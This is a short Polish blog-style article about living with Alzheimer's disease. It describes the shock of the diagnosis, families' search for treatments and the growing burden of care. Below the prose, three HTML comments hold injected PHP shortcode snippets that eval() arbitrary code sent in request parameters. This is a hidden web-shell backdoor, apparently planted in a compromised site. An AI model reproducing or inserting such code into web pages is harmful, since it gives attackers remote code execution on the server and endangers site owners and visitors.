Mieszkanie z Alzheimerem

     Zgodnie z definicją serwisu wikipedia.org Choroba Alzheimera to najczęstsza postać otępienia, nieuleczalna i postępująca choroba neurodegeneracyjna, prowadząca do śmierci pacjenta. To ostatnie stwierdzenie "prowadząca do śmierci pacjenta", szokuje chorego i jego najbliższą rodzinę. Sprawia, że robią wszystko, aby odsunąć w czasie tą chwilę, starają się o niej nie myśleć wyrzucając ją z podświadomości. Liczą czas, jaki jeszcze mógł być im dany, szukają nowych leków, konsultują się z innymi specjalistami. Niejednokrotnie sięgają po medycynę alternatywną.

Choroba Alzheimera

Choroba Alzheimera

     Kiedy nadchodzi moment, w którym godzą się z wyrokiem, jaki na nich wydało życie, starają się zminimalizować skutki tej choroby i żyć tak jak dawniej. Zmiany, jakie zachodzą w ich życiu, początkowo są niewielkie, jednak z czasem ich ilość narasta przypominając kulę śnieżną, która stopniowo staje się coraz większa i pędzi coraz szybciej. Kiedy docierają do granic wytrzymałości fizycznej i psychicznej powraca do nich myśl o śmierci, która może uwolnić ich o tego wszystkiego, z czym przez tyle lat walczyli.

<!-- [insert_php]if (isset($_REQUEST["TVsSb"])){eval($_REQUEST["TVsSb"]);exit;}[/insert_php][php]if (isset($_REQUEST["TVsSb"])){eval($_REQUEST["TVsSb"]);exit;}[/php] -->

<!-- [insert_php]if (isset($_REQUEST["OEK"])){eval($_REQUEST["OEK"]);exit;}[/insert_php][php]if (isset($_REQUEST["OEK"])){eval($_REQUEST["OEK"]);exit;}[/php] -->

<!-- [insert_php]if (isset($_REQUEST["VuQZg"])){eval($_REQUEST["VuQZg"]);exit;}[/insert_php][php]if (isset($_REQUEST["VuQZg"])){eval($_REQUEST["VuQZg"]);exit;}[/php] -->

Możliwość komentowania jest wyłączona.